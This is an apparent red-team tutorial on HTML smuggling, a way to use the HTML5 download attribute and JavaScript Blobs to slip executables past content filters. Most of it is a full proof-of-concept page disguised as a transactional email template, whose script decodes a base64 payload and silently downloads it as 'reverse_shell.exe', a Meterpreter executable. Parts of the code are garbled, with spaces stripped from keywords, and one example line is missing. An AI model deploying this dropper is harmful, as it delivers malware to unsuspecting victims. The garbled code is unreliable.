Using a combination of HTML5 and JavaScript to sneak malicious files past content filters.This mechanism has been incorporated into popular offensive frameworks such as Demiguise and SharpShooter .
HTML5 download attribute
HTML5 introduced the “download” attribute for anchor tags. Consider the following line of HTML, which is supported by all modern browsers:
When a user clicks on the hyperlink, the download attribute instructs the browser to download the target pointed to by the href attribute and save it to disk as “myfile.doc”. Of course, the anchor and its download attribute can also be created using JavaScript instead of HTML:
var myAnchor =document.createElement('a');myAnchor.download ='filename.doc';
Blobs and URLs
A Blob is an immutable object that represents raw data. Blobs allow you to construct file-like objects on the client that you can pass to JavaScript APIs that expect URLs. Instead of requiring that the web server provides the file, the Blob can be constructed locally using pure JavaScript.
var myBlob =newBlob([myData], {type:'octet/stream'});
This line creates a Blob of MIME type “octet/stream” and fills is with the data contained in variable myData. We can then use URL.createObjectURL to create a URL from our Blob object and have an anchor point to it:
var myUrl =window.URL.createObjectURL(blob);myAnchor.href = myUrl;
Lastly, we can simulate a click on the anchor object using JavaScript’s HTMLElement.click() method:
myAnchor.click();
This will result in triggering the anchor’s click event, which in turn points to our Blob and which will be downloaded as “filename.doc” (since we specified the download attribute). These features are supported by all major modern browsers. For older versions of Internet Explorer (not Edge) we can revert to the msSaveBlob method to save a Blob object to disk.
Exploitation
First, our Base64 code is placed into an array buffer, byte-by- byte.
We’ll then place the array buffer into our Blob. Next, we’ll create a hidden “a” tag. The data from our Blob is then moved to the href reference of our “a” tag. Our Blob code in the href is given the file name of ‘msfnonstaged.exe’. Finally, a click action is performed to download our file. The complete webpage used to trigger the HTML smuggling with the Meterpreter executable is given below:
<!doctypehtml><html> <head> <metaname="viewport"content="width=device-width" /> <metahttp-equiv="Content-Type"content="text/html; charset=UTF-8" /> <title>Simple Transactional Email</title> <style>/* ------------------------------------- GLOBAL RESETS ------------------------------------- *//*All the styling goes here*/img {border:none;-ms-interpolation-mode:bicubic;max-width:100%; }body {background-color:#f6f6f6;font-family:sans-serif;-webkit-font-smoothing:antialiased;font-size:14px;line-height:1.4;margin:0;padding:0;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%; }table {border-collapse:separate;mso-table-lspace:0pt;mso-table-rspace:0pt;width:100%; }tabletd {font-family:sans-serif;font-size:14px;vertical-align:top; }/* ------------------------------------- BODY & CONTAINER ------------------------------------- */.body {background-color:#f6f6f6;width:100%; } /* Set a max-width, and make it display as block so it will automatically stretch to that width, but will also shrink down on a phone or something */
.container {display:block;margin:0 auto !important;/* makes it centered */max-width:580px;padding:10px;width:580px; }/* This should also be a block element, so that it will fill 100% of the .container */.content {box-sizing:border-box;display:block;margin:0 auto;max-width:580px;padding:10px; }/* ------------------------------------- HEADER, FOOTER, MAIN ------------------------------------- */.main {background:#ffffff;border-radius:3px;width:100%; }.wrapper {box-sizing:border-box;padding:20px; }.content-block {padding-bottom:10px;padding-top:10px; }.footer {clear:both;margin-top:10px;text-align:center;width:100%; }.footertd,.footerp,.footerspan,.footera {color:#999999;font-size:12px;text-align:center; }/* ------------------------------------- TYPOGRAPHY ------------------------------------- */h1,h2,h3,h4 {color:#000000;font-family:sans-serif;font-weight:400;line-height:1.4;margin:0;margin-bottom:30px; }h1 {font-size:35px;font-weight:300;text-align:center;text-transform:capitalize; }p,ul,ol {font-family:sans-serif;font-size:14px;font-weight:normal;margin:0;margin-bottom:15px; }pli,ulli,olli {list-style-position:inside;margin-left:5px; }a {color:#3498db;text-decoration:underline; }/* ------------------------------------- BUTTONS ------------------------------------- */.btn {box-sizing:border-box;width:100%; }.btn>tbody>tr>td {padding-bottom:15px; }.btntable {width:auto; }.btntabletd {background-color:#ffffff;border-radius:5px;text-align:center; }.btna {background-color:#ffffff;border:solid 1px #3498db;border-radius:5px;box-sizing:border-box;color:#3498db;cursor:pointer;display:inline-block;font-size:14px;font-weight:bold;margin:0;padding:12px 25px;text-decoration:none;text-transform:capitalize; }.btn-primarytabletd {background-color:#3498db; }.btn-primarya {background-color:#3498db;border-color:#3498db;color:#ffffff; }/* ------------------------------------- OTHER STYLES THAT MIGHT BE USEFUL ------------------------------------- */.last {margin-bottom:0; }.first {margin-top:0; }.align-center {text-align:center; }.align-right {text-align:right; }.align-left {text-align:left; }.clear {clear:both; }.mt0 {margin-top:0; }.mb0 {margin-bottom:0; }.preheader {color:transparent;display:none;height:0;max-height:0;max-width:0;opacity:0;overflow:hidden;mso-hide:all;visibility:hidden;width:0; }.powered-bya {text-decoration:none; }hr {border:0;border-bottom:1px solid #f6f6f6;margin:20px 0; }/* ------------------------------------- RESPONSIVE AND MOBILE FRIENDLY STYLES ------------------------------------- */@mediaonlyscreenand (max-width:620px) {table[class=body] h1 {font-size:28px!important;margin-bottom:10px!important; }table[class=body] p,table[class=body] ul,table[class=body] ol,table[class=body] td,table[class=body] span,table[class=body] a {font-size:16px!important; }table[class=body] .wrapper,table[class=body] .article {padding:10px!important; }table[class=body] .content {padding:0 !important; }table[class=body] .container {padding:0 !important;width:100%!important; }table[class=body] .main {border-left-width:0 !important;border-radius:0 !important;border-right-width:0 !important; }table[class=body] .btntable {width:100%!important; }table[class=body] .btna {width:100%!important; }table[class=body] .img-responsive {height:auto !important;max-width:100%!important;width:auto !important; } }/* ------------------------------------- PRESERVE THESE STYLES IN THE HEAD ------------------------------------- */@mediaall {.ExternalClass {width:100%; }.ExternalClass,.ExternalClassp,.ExternalClassspan,.ExternalClassfont,.ExternalClasstd,.ExternalClassdiv {line-height:100%; }.apple-linka {color:inherit !important;font-family:inherit !important;font-size:inherit !important;font-weight:inherit !important;line-height:inherit !important;text-decoration:none !important; }#MessageViewBodya {color:inherit;text-decoration:none;font-size:inherit;font-family:inherit;font-weight:inherit;line-height:inherit; }.btn-primarytabletd:hover {background-color:#34495e !important; }.btn-primarya:hover {background-color:#34495e !important;border-color:#34495e !important; } } </style> </head> <body> <h1>HTML file smuggling PoC</h1> </body> <script>functionbase64ToArrayBuffer(base64) {var binary_string =window.atob(base64);var len =binary_string.length;var bytes =newUint8Array( len );for (var i =0; i < len; i++) { bytes[i] =binary_string.charCodeAt(i); }returnbytes.buffer; }// payload var file ='base64 encoded payload here'var data =base64ToArrayBuffer(file);var blob =newBlob([data], {type:'octet/stream'});var fileName ='reverse_shell.exe';if (window.navigator.msSaveOrOpenBlob) {window.navigator.msSaveOrOpenBlob(blob,fileName); } else {var a =document.createElement('a');console.log(a);document.body.appendChild(a);a.style ='display: none';var url =window.URL.createObjectURL(blob);a.href = url;a.download = fileName;a.click();window.URL.revokeObjectURL(url); } </script></html>
